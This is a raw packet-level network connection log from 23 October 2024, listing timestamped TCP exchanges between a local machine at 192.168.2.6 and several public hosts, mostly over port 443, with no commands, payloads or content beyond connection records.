                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.885390043 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.885409117 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.885411978 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.885442972 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.928293943 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.928442001 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.973464012 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.973500013 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.973537922 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.973546982 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.973567963 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.973577023 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.973599911 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.973603010 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.973637104 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.975025892 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.975342989 CEST44349885141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.975358963 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.975399017 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.975586891 CEST49885443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.975606918 CEST44349885141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.975893974 CEST44349885141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.976186991 CEST49885443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.976242065 CEST44349885141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.976311922 CEST49885443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.976828098 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.976887941 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.977150917 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.977236032 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.977292061 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.986032009 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.986192942 CEST49884443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.986205101 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.986490011 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.986778021 CEST49884443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.986835003 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.986875057 CEST49884443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.987948895 CEST44349883192.0.76.3192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.988140106 CEST49883443192.168.2.6192.0.76.3
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.988182068 CEST44349883192.0.76.3192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.989794970 CEST44349883192.0.76.3192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.989871025 CEST49883443192.168.2.6192.0.76.3
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.990717888 CEST49883443192.168.2.6192.0.76.3
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.990801096 CEST44349883192.0.76.3192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:13.990871906 CEST49883443192.168.2.6192.0.76.3
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.003844976 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.003858089 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.003901958 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.003935099 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.003942966 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.003976107 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.003988028 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.004162073 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.004169941 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.004213095 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.004288912 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.004337072 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.019351959 CEST44349885141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.022799015 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.022865057 CEST49885443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.022871017 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.022897959 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.022907019 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.022914886 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.022914886 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.022927999 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.022970915 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.022974968 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.022988081 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.023036957 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.023042917 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.023539066 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.023732901 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.023740053 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.027338982 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.028085947 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.028147936 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.028155088 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.031327963 CEST44349883192.0.76.3192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.034116030 CEST49883443192.168.2.6192.0.76.3
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.034118891 CEST49884443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.034132004 CEST44349883192.0.76.3192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.036286116 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.036324978 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.036365986 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.036385059 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.036401033 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.050395012 CEST44349892141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.050839901 CEST49892443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.050848007 CEST44349892141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.051827908 CEST44349892141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.051901102 CEST49892443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.052340031 CEST49892443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.052398920 CEST44349892141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.052514076 CEST49892443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.052520990 CEST44349892141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.065402031 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.081386089 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.081676960 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.081677914 CEST49883443192.168.2.6192.0.76.3
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.093063116 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.093082905 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.093130112 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.093139887 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.093173981 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.093185902 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.097389936 CEST49892443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.116791010 CEST44349883192.0.76.3192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.116971016 CEST44349883192.0.76.3192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.117152929 CEST49883443192.168.2.6192.0.76.3
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.117667913 CEST49883443192.168.2.6192.0.76.3
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.117690086 CEST44349883192.0.76.3192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.121983051 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122097969 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122169971 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122186899 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122256994 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122303009 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122311115 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122421980 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122469902 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122476101 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122750998 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122817039 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122817993 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122824907 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122832060 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122863054 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122874022 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122941017 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.122947931 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.123135090 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.123192072 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.123626947 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.123683929 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.124480963 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.124527931 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.124536991 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.124588966 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.124594927 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.124631882 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.127749920 CEST4971880192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.129348040 CEST49881443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.129362106 CEST44349881141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.129807949 CEST44349893141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.130644083 CEST49893443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.130650997 CEST44349893141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.131129026 CEST44349885141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.131210089 CEST44349885141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.131298065 CEST49885443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.133008957 CEST49885443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.133018017 CEST44349885141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.133717060 CEST8049718141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.134198904 CEST44349893141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.134260893 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.134268045 CEST49893443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.134306908 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.134349108 CEST49884443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.134358883 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.134371996 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.134414911 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.134418011 CEST49884443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.134435892 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.134479046 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.134504080 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.134547949 CEST49884443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.134547949 CEST49884443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.134584904 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.135054111 CEST49893443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.135133982 CEST44349893141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.135217905 CEST49893443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.135224104 CEST44349893141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.137563944 CEST49896443192.168.2.6192.0.76.3
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.137639046 CEST44349896192.0.76.3192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.137712002 CEST49896443192.168.2.6192.0.76.3
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.137936115 CEST49896443192.168.2.6192.0.76.3
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.137967110 CEST44349896192.0.76.3192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.139946938 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.139959097 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.140047073 CEST49884443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.140062094 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.140156984 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.140249014 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.140279055 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.140291929 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.140333891 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.140382051 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.140537977 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.140593052 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.140598059 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.141158104 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.141204119 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.141208887 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.141314030 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.141382933 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.141387939 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.142034054 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.142086029 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.142091036 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.142195940 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.142242908 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.142246962 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.142824888 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.142879963 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.142884016 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.142976999 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.143021107 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.143024921 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.143129110 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.143182039 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.143188000 CEST44349882141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.154033899 CEST4434988713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.155283928 CEST49887443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.155323982 CEST4434988713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.156141996 CEST49887443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.156152010 CEST4434988713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.164330959 CEST4434989013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.165805101 CEST49890443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.165829897 CEST4434989013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.166435957 CEST49890443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.166443110 CEST4434989013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.166518927 CEST4434988813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.166889906 CEST49897443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.166913986 CEST44349897141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.166976929 CEST49897443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.167188883 CEST49897443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.167198896 CEST44349897141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.167617083 CEST49888443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.167629957 CEST4434988813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.168173075 CEST49888443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.168179035 CEST4434988813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.175045967 CEST4434989113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.175852060 CEST49891443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.175892115 CEST4434989113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.176486969 CEST49891443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.176491022 CEST4434989113.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.176597118 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.176603079 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.176634073 CEST49893443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.192275047 CEST49884443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.192279100 CEST49882443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.224287033 CEST49886443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.614248991 CEST44349892141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.614301920 CEST44349892141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.614372015 CEST44349892141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.614404917 CEST44349892141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.614440918 CEST44349892141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.614469051 CEST49892443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.614499092 CEST44349892141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.614520073 CEST49892443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.614609003 CEST44349892141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.614644051 CEST49892443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.616354942 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.616390944 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.616430044 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.616457939 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.616486073 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.616509914 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.616522074 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.616576910 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.616770983 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.616821051 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.616887093 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.616899014 CEST44349866141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.616916895 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.616954088 CEST49866443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617243052 CEST49892443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617274046 CEST44349892141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617470026 CEST44349886141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617521048 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617579937 CEST44349884141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:14.617607117 CEST44349884141.193.213.10192.168.2.6
